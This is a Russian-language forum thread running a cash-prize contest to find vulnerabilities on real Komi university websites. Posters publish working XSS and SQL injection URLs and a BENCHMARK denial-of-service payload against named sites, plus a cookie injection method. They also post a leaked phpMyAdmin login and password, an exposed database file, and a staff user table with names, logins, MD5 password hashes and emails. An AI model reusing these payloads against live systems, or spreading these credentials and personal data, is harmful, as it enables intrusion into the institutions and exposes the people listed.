1 Ответ от windtalker

  • Зарегистрирован: 2010-01-21
  • Сообщений: 52

Re: Сайты ВУЗов Сыктывкара и Коми

В предверие нового учебного года сайт PKonline.ru представляет беспрецедентную акцию : "Найди багу - получи номерок"

Все мы знаем что сейчас без высшего образования никуда, однако так ли это ? Многие security-специалисты, программисты, дизайнеры, оптимизаторы веб-сайтов не имеют такого образования. Итак, суть акции : вы находите какую-либо интересную багу или просто скрытую возможность на сайтах ВУЗов Республики Коми, опубликовываете её,получаете за уникальность - номерок и признание smile

Добавление : партнерка VIPCODEC добавляет призовой фонд

1 место - 35 WMZ
2 место - 17 WMZ
3 место - 7 WMZ

Конкурс продолжаться до 1 сентября

2 Ответ от szine

  • szine
  • New member
  • Неактивен
  • Зарегистрирован: 1970-01-01
  • Сообщений: 0

Re: Сайты ВУЗов Сыктывкара и Коми

Предлагаю список сайтов :
www.sli.kom.com
syktsu.ru
kgpi.ru
Начнем :
XSS у КГПИ
_http://kgpi.ru/?mod=pages&page=nauka&menuid=<script>alert('XSS%20ATTACK')</script>

Отредактировано szine (2008-07-29 18:16:27)

3 Ответ от Кенни

  • Зарегистрирован: 1970-01-01
  • Сообщений: 15

Re: Сайты ВУЗов Сыктывкара и Коми

Демон мыльный, там же
_http://www.kgpi.ru:81/WorldClient.dll?View=Main

4 Ответ от szine

  • szine
  • New member
  • Неактивен
  • Зарегистрирован: 1970-01-01
  • Сообщений: 0

Re: Сайты ВУЗов Сыктывкара и Коми

o_0 сливаем базу Лесного Института (все в открытом доступе)

_http://www.sli.komi.com/sli/db/

"klopklop";"byajhvfnbrf";"&#1057;&#1051;&#1048;";"http://www.sli.komi.com/sli/mail/mailing_list";"info@sfi.komi.com";"info@sfi.komi.com";"CDOSYS";"mail.sfi.komi.com";"#ebf5d8";"#006600";"Geneva, Arial, Helvetica, san-serif";12;"#ff9900";"#ff9900";"#dd6600";"TEST!!!";"text";1

5 Ответ от Кенни

  • Зарегистрирован: 1970-01-01
  • Сообщений: 15

Re: Сайты ВУЗов Сыктывкара и Коми

скуль у СЛИ

http://www.sli.komi.com/bolshakov/eng/search.asp?PageNo=1&search=emaill@moy.ru+and+99999-99999=0+--+

6 Ответ от windtalker

  • Зарегистрирован: 2010-01-21
  • Сообщений: 52

Re: Сайты ВУЗов Сыктывкара и Коми

активней товарищи, скоро начало учебного года и конец конкурса

ещё один сайт подходящий под условия конкурса - ugtu.net - Ухтинский Университет

з.ы. В конце конкурса всех посетителей сайта PKonline.ru ждет аналитическая статья от меня + небольшой сюрприз

7 Ответ от ZEG

  • ZEG
  • New member
  • Неактивен
  • Зарегистрирован: 1970-01-01
  • Сообщений: 0

Re: Сайты ВУЗов Сыктывкара и Коми

проверял сайт СГУ , отослал отчет г-ну Согрину, как тот устранит уязвимости критические - выложу отчет

8 Ответ от ZEG

  • ZEG
  • New member
  • Неактивен
  • Зарегистрирован: 1970-01-01
  • Сообщений: 0

Re: Сайты ВУЗов Сыктывкара и Коми

найдено и сообщено администрации (послал в письме, отреагировали)

syktsu.ru/news/
syktsu.ru/images/
syktsu.ru/backup/
http://syktsu.ru/logs/
http://syktsu.ru/inc/menu.inc

http://syktsu.ru/myadmin/
логин coced
пароль nhe,fleh

Правка 1 Трушко К.Е. kirill 241fe8af1e038118cd817048a65f803e ceaz@yandex.ru 1171235450 1100000000 0 0
Правка 0 Guest Guest 0 0 0 0
Правка 2 Басенко А.О. alexb 827ccb0eea8a706c4c34a16891f84e7b kzoi@inbox.ru 1171568318 1100000000 0 0
Правка 3 Согрин Г.А. sogrin 6a710cdccdb02b3301d71d83ed3d15b3 sogrin@syktsu.ru 1172140089 1100000000 0 0
Правка 4 Пахомов Иван sparks 4b5dd2281770ef389a4dccf166d1b696 cyrex@bk.ru 1173961977 1100000000 0 0
Правка 7 Кузьмина Т.Н. kuzmina 020389c447a5cee43447f8d8c122a7ee kuzmina@syktsu.ru 1175798893 1100000000 0 0
...
Правка 87 Юшков С. А. Yushkov d21281e68e4bcb27ecd3b37f013be65c rac@syktsu.ru 1179836953 1100000000 0 0
Правка 88 Бачаров Д.С. bocharov a840bd95bff0e05c8c4eddef0d65fcb8 botany@syktsu.ru

и ещё одна старая уязвимость - устранена, вернее снесен полностью форум
_http://student.syktsu.ru/forum/upload/install/upgrade_301.php?step=SomeWord
кто сомневается что уязвимость была - могу выложить кусочек базы

9 Ответ от ZEG

  • ZEG
  • New member
  • Неактивен
  • Зарегистрирован: 1970-01-01
  • Сообщений: 0

Re: Сайты ВУЗов Сыктывкара и Коми

возможен небольшой ддос при проверке логина
' + BENCHMARK(10000000,BENCHMARK(10000000,md5(current_ date)))/*
во еще что выпадает при авторизации(:
SELECT * FROM `sunz_users` WHERE `login` = ''' LIMIT 1;
так же возможен брутофорс
_http://syktsu.ru/?login:verify;

10 Ответ от windtalker

  • Зарегистрирован: 2010-01-21
  • Сообщений: 52

Re: Сайты ВУЗов Сыктывкара и Коми

SQL-injection

http://syktsu.ru:80/job/login_org.php
открываем Cookies и редактируем параметр SESSID - не проверяется слеш, одинарная кавычка и тд.

11 Ответ от windtalker

  • Зарегистрирован: 2010-01-21
  • Сообщений: 52

Re: Сайты ВУЗов Сыктывкара и Коми

Итак, подведем итоги

Хоть в конкурсе была небольшая активность. все-же подведем итоги

первое место - ZEG
второе место - szine
третье место - Кенни


скоро будет ещё один конкурс, дерзайте. Всем участникам просьба стукнуть в ПМ